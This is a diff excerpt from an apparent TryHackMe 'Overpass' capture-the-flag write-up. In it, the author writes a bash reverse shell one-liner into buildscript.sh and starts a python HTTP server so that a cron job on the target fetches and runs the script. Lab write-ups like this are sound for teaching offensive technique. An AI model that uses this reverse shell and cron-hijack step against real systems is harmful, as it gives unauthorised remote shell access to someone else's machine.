ajread4/thm_writeups_publish/overpass_writeup_publish.md

 ff02::1 ip6-allnodes
 ff02::2 ip6-allrouters
 ```
-Let me create a reverse shell in bash and place it within my local machine at /downloads/src/buildscript.sh
+Let me create a reverse shell in bash and place it within my local machine at ```/downloads/src/buildscript.sh```.
 ```
 echo "bash -i >& /dev/tcp/[Local IP]/5555 0>&1" > buildscript.sh
 ```
-After creating the buildscript, I need to start up a python3 http server on port 80 for the remote machine to call with the crontab.
+After creating the buildscript, I need to start up a python3 http server on port 80 in the parent directory of ```/downloads/src/buildscript.sh```for the remote machine to call with the crontab.
 ```
 sudo python3 -m http.server 80
 ```